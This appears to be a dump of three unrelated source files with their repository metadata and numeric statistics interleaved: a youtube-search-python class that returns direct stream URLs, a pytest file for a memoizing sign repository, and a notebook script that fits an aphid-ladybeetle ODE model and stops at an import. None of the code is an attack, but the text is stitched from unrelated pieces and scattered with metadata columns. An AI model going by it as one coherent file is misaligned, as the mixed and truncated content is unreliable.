f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | 5
|
2021-03-25T12:09:07.000Z
|
2021-06-07T06:33:43.000Z
|
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | null | null | null |
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | null | null | null |
from typing import Union
from youtubesearchpython.internal.streamurlfetcher import StreamURLFetcherInternal
class StreamURLFetcher(StreamURLFetcherInternal):
'''Gets direct stream URLs for a YouTube video fetched using `Video.get` or `Video.getFormats`.
This class can fetch direct video URLs without any additional network requests (that's really fast).
Call `get` or `getAll` method of this class & pass response returned by `Video.get` or `Video.getFormats` as parameter to fetch direct URLs.
Getting URLs or downloading streams using youtube-dl or PyTube is can be a slow, because of the fact that they make requests to fetch the same content, which one might have already recieved at the time of showing it to the user etc.
This class makes use of PyTube (if installed) & makes some slight improvements to functioning of PyTube.
Avoid instantiating this class more than once, it will be slow (making global object of the class will be a recommended solution).
Raises:
Exception: "ERROR: PyTube is not installed. To use this functionality of youtube-search-python, PyTube must be installed."
Examples:
Returns direct stream URL.
>>> from youtubesearchpython import *
>>> fetcher = StreamURLFetcher()
>>> video = Video.get("https://www.youtube.com/watch?v=aqz-KE-bpKQ")
>>> url = fetcher.get(video, 251)
>>> print(url)
"https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=251&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=audio%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=10210834&dur=634.601&lmt=1544629945422176&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5511222&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRAIgKKIEiwQTgXsdKPEyOckgVPs_LMH6KJoeaYmZic_lelECIHXHs1ZnSP5mgtpffNlIMJM3DhxcvDbA-4udFFE6AmVP&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D"
'''
def __init__(self):
super().__init__()
def get(self, videoFormats: dict, itag: int) -> Union[str, None]:
'''Gets direct stream URL for a YouTube video fetched using `Video.get` or `Video.getFormats`.
Args:
videoFormats (dict): Dictionary returned by `Video.get` or `Video.getFormats`.
itag (int): Itag of the required stream.
Returns:
Union[str, None]: Returns stream URL as string. None, if no stream is present for that itag.
Examples:
Returns direct stream URL.
>>> from youtubesearchpython import *
>>> fetcher = StreamURLFetcher()
>>> video = Video.get("https://www.youtube.com/watch?v=aqz-KE-bpKQ")
>>> url = fetcher.get(video, 251)
>>> print(url)
"https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=251&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=audio%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=10210834&dur=634.601&lmt=1544629945422176&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5511222&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRAIgKKIEiwQTgXsdKPEyOckgVPs_LMH6KJoeaYmZic_lelECIHXHs1ZnSP5mgtpffNlIMJM3DhxcvDbA-4udFFE6AmVP&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D"
'''
self._getDecipheredURLs(videoFormats)
for stream in self.player_response["url_encoded_fmt_stream_map"]:
if stream["itag"] == itag:
return stream["url"]
return None
def getAll(self, videoFormats: dict) -> Union[dict, None]:
'''Gets all stream URLs for a YouTube video fetched using `Video.get` or `Video.getFormats`.
Args:
videoFormats (dict): Dictionary returned by `Video.get` or `Video.getFormats`.
Returns:
Union[dict, None]: Returns stream URLs in a dictionary.
Examples:
Returns direct stream URLs in a dictionary.
>>> from youtubesearchpython import *
>>> fetcher = StreamURLFetcher()
>>> video = Video.get("https://www.youtube.com/watch?v=aqz-KE-bpKQ")
>>> allUrls = fetcher.getAll(video)
>>> print(allUrls)
{
"streams": [
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=18&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=video%2Fmp4&ns=AAHB1CvhVqlATtzQj67WHI8F&gir=yes&clen=47526444&ratebypass=yes&dur=634.624&lmt=1544610273905877&mt=1610776131&fvip=6&c=WEB&txp=5531432&n=Laycu1cJ2fCN_K&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cratebypass%2Cdur%2Clmt&sig=AOq0QJ8wRQIgdjTwmtEc3MpmRxH27ZvTgktL-d2by5HXXGFwo3EGR4MCIQDi0oiI8mshGssiOFu1XzQCqljZuNLhA6z19S8Ig0CRTQ%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "video/mp4; codecs=\"avc1.42001E, mp4a.40.2\"",
"quality": "medium",
"itag": 18,
"bitrate": 599167,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=22&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=video%2Fmp4&ns=AAHB1CvhVqlATtzQj67WHI8F&ratebypass=yes&dur=634.624&lmt=1544610886483826&mt=1610776131&fvip=6&c=WEB&txp=5532432&n=Laycu1cJ2fCN_K&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cratebypass%2Cdur%2Clmt&sig=AOq0QJ8wRQIhALaSHkcx0m9rfqJKoiJT1dY7spIKf-zDfq12SOdN7Ej5AiBCgvcUvLUGqGoMBnc0NIQtDeNM8ETJD2lTt9Bi7T186g%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "video/mp4; codecs=\"avc1.64001F, mp4a.40.2\"",
"quality": "hd720",
"itag": 22,
"bitrate": 1340380,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=315&aitags=133%2C134%2C135%2C136%2C160%2C242%2C243%2C244%2C247%2C278%2C298%2C299%2C302%2C303%2C308%2C315%2C394%2C395%2C396%2C397%2C398%2C399&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=video%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=1648069666&dur=634.566&lmt=1544611995945231&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5532432&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRQIgGaJmx70EkBCsfAYOI1lI695hXnFSEn-ZAfRiqWrnt9ACIQClBT5YZlou5ttgFzKnLZkUKxjZznxMJGPTNvtXCAlebw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "video/webm; codecs=\"vp9\"",
"quality": "hd2160",
"itag": 315,
"bitrate": 26416339,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=308&aitags=133%2C134%2C135%2C136%2C160%2C242%2C243%2C244%2C247%2C278%2C298%2C299%2C302%2C303%2C308%2C315%2C394%2C395%2C396%2C397%2C398%2C399&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=video%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=627075264&dur=634.566&lmt=1544611159960793&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5532432&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRQIhALl1_ksmnpBhD49Hgjdg-z-Y4H2AL8hBx63ephvsvhbCAiAFrqyy65MimA4mCXYQBopP67G9dtwH9xyjHS_0hZ-rJA%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "video/webm; codecs=\"vp9\"",
"quality": "hd1440",
"itag": 308,
"bitrate": 13381315,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=134&aitags=133%2C134%2C135%2C136%2C160%2C242%2C243%2C244%2C247%2C278%2C298%2C299%2C302%2C303%2C308%2C315%2C394%2C395%2C396%2C397%2C398%2C399&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=video%2Fmp4&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=26072934&dur=634.566&lmt=1544609325917976&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5532432&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRgIhAKT9N5EmUz3OQOc9IA8P1CuYgzPStz4ulJvCkA8Y1Cf4AiEAwwC2mCjOFWD5jFhAu8g0O6EF5fYJ7HmwskN1sjqTHlA%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "video/mp4; codecs=\"avc1.4d401e\"",
"quality": "medium",
"itag": 134,
"bitrate": 723888,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=249&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=audio%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=3936299&dur=634.601&lmt=1544629945028066&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5511222&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAJ_UffgeslE26GFwlMZHBsW-zYLcnanMqrvESdjWoupYAiAH7KlvQlYsokTVCCcD7jflD21Fjiim28qNzhOKZ88D3Q%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "audio/webm; codecs=\"opus\"",
"quality": "tiny",
"itag": 249,
"bitrate": 57976,
"is_otf": false
},
{
"url": "https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=258&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=audio%2Fmp4&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=30769612&dur=634.666&lmt=1544629837561969&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5511222&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRgIhAP6XrnFm3AHxyk8xjU6mJLdVN-uWLl1ItHk5_ONUiRuPAiEAlEYQBsOoEraFemkJIL7OMyHL9aszxW4CbDlxro-AY3Q%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D",
"type": "audio/mp4; codecs=\"mp4a.40.2\"",
"quality": "tiny",
"itag": 258,
"bitrate": 390017,
"is_otf": false
}
]
}
'''
self._getDecipheredURLs(videoFormats)
return {"streams": self.player_response["url_encoded_fmt_stream_map"]}
| 103.182482
| 1,081
| 0.713356
| 1,671
| 14,136
| 5.985637
| 0.20766
| 0.010798
| 0.017996
| 0.010798
| 0.745451
| 0.740152
| 0.727654
| 0.719356
| 0.711358
| 0.711358
| 0
| 0.163324
| 0.164049
| 14,136
| 136
| 1,082
| 103.941176
| 0.683084
| 0.893676
| 0
| 0.142857
| 0
| 0
| 0.092958
| 0.073239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.142857
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
82d53e2e7141b657585a740ec8c949fdd623b04e
| 3,080
|
py
|
Python
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 4
|
2020-04-12T14:24:51.000Z
|
2020-10-15T15:48:15.000Z
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 200
|
2019-12-04T09:53:20.000Z
|
2022-03-30T20:11:31.000Z
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 1
|
2021-09-06T16:22:39.000Z
|
2021-09-06T16:22:39.000Z
|
from ebl.signs.infrastructure.menoizing_sign_repository import MemoizingSignRepository
def test_find_memoization(sign_repository, signs, when):
sign = signs[0]
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.find(sign.name)
second = memoizing_sign_repository.find(sign.name)
assert first is second
def test_search_memoization(sign_repository, signs):
sign = signs[0]
value = sign.values[0].value
sub_index = sign.values[0].sub_index
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search(value, sub_index)
second = memoizing_sign_repository.search(value, sub_index)
assert first == sign
assert first is second
def test_search_by_lists_name_memoization(sign_repository, signs):
sign = signs[0]
name = sign.lists[0].name
number = sign.lists[0].number
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search_by_lists_name(name, number)
second = memoizing_sign_repository.search_by_lists_name(name, number)
assert [sign] == first
assert first is second
def test_search_include_homophones(sign_repository, signs):
sign = signs[0]
value = sign.values[0].value
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search_include_homophones(value)
second = memoizing_sign_repository.search_include_homophones(value)
assert [sign] == first
assert first is second
def test_search_composite_signs(sign_repository, signs):
sign = signs[0]
value = sign.values[0].value
sub_index = sign.values[0].sub_index
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search_composite_signs(value, sub_index)
second = memoizing_sign_repository.search_composite_signs(value, sub_index)
assert [sign] == first
assert first is second
def test_search_by_id(sign_repository, signs):
sign = signs[0]
name = sign.name
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search_by_id(name)
second = memoizing_sign_repository.search_by_id(name)
assert [sign] == first
assert first is second
def test_search_all(sign_repository, signs):
sign = signs[0]
value = sign.values[0].value
sub_index = sign.values[0].sub_index
memoizing_sign_repository = MemoizingSignRepository(sign_repository)
memoizing_sign_repository.create(sign)
first = memoizing_sign_repository.search_all(value, sub_index)
second = memoizing_sign_repository.search_all(value, sub_index)
assert [sign] == first
assert first is second
| 31.428571
| 86
| 0.772727
| 383
| 3,080
| 5.890339
| 0.091384
| 0.266844
| 0.285461
| 0.154255
| 0.898493
| 0.893174
| 0.867021
| 0.785904
| 0.689273
| 0.62766
| 0
| 0.00613
| 0.152597
| 3,080
| 97
| 87
| 31.752577
| 0.858238
| 0
| 0
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19697
| 1
| 0.106061
| false
| 0
| 0.015152
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82e8d883fd2ccafa52d32f4e80d615c9a103b165
| 389,064
|
py
|
Python
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 1
|
2020-11-10T22:29:25.000Z
|
2020-11-10T22:29:25.000Z
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 3
|
2021-04-28T03:57:22.000Z
|
2021-05-18T21:35:26.000Z
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 1
|
2021-05-10T18:45:59.000Z
|
2021-05-10T18:45:59.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Aphid-Ladybeetle study
# In[1]:
import numpy as np # linear algebra
from numba import jit
import arviz as az
from arviz.utils import Numba
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
import pymc3 as pm # for uncertainty quantification and model calibration
import theano # to control better pymc3 backend and write a wrapper
import theano.tensor as t # for the wrapper to a custom model to pymc3
import time
import warnings
np.seterr('warn')
warnings.filterwarnings("ignore")
az.style.use("arviz-darkgrid")
Numba.enable_numba()
seed = 1234
np.random.seed(seed)
# ## Obtaining Initial Conditions
#
# We need to define Initial Conditions as functions in order to define them for each discretization point. Here we will fit ICs as polynomial functions.
# Loading data:
# ### 2018_Lin_and_Pennings
# In[2]:
data_dir = "../data/2018 Lin and Pennings/appendix/"
aphid_data = pd.read_csv(data_dir + 'aphid.CSV')
ladybeetle_data = pd.read_csv(data_dir + 'ladybeetle.CSV')
# In[3]:
aphid_data
# In[4]:
ladybeetle_data
# Retrieving IC data:
# In[5]:
aphid_ic = aphid_data[aphid_data.Time == 1].Density.values[0]
ladybeetle_ic = ladybeetle_data[ladybeetle_data.Time == 1].Density.values[0]
# In[6]:
aphid_ic
# In[7]:
ladybeetle_ic
# In[8]:
y0 = aphid_ic, ladybeetle_ic
y0
# In[9]:
import matplotlib.pyplot as plt
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 6))
ax1.plot(aphid_data.Time.values, aphid_data.Density.values, '-o', c='r')
ax1.set(xlabel='Time', ylabel='Population')
ax2.plot(ladybeetle_data.Time.values, ladybeetle_data.Density.values, '-o', c='b')
ax2.set(xlabel='Time')
plt.show()
# # Constant Prey Growth FR1 model
# In[10]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP1_model(
t,
X,
r1 = 1,
a1 = 1,
):
u, v = X
u_prime = r1 - a1 * u * v
v_prime = 0
return u_prime, v_prime
def CP1_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
):
solution_ODE = solve_ivp(
fun=CP1_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[11]:
def CP1_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[12]:
from scipy import optimize
seed = 1234
r1=6.13939027780853
a1=0.04436839266096163
denom_min = 0.1
denom_max = 1.9
bounds_CP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_CP1 = optimize.differential_evolution(
CP1_least_squares_error_ode,
bounds=bounds_CP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
CP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_CP1)
# * Retrieving the calibrated parameter values:
# In[13]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
) = result_CP1.x
solution_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_CP1.x
)
t_computed_CP1, y_computed_CP1 = solution_ODE_CP1.t, solution_ODE_CP1.y
u_CP1, v_CP1 = y_computed_CP1
parameters_dict = {
"Model": "CP1",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[14]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP1, u_CP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP1, v_CP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[15]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[16]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = CP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
CP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[17]:
from SALib.analyze.morris import analyze as ee_analyze
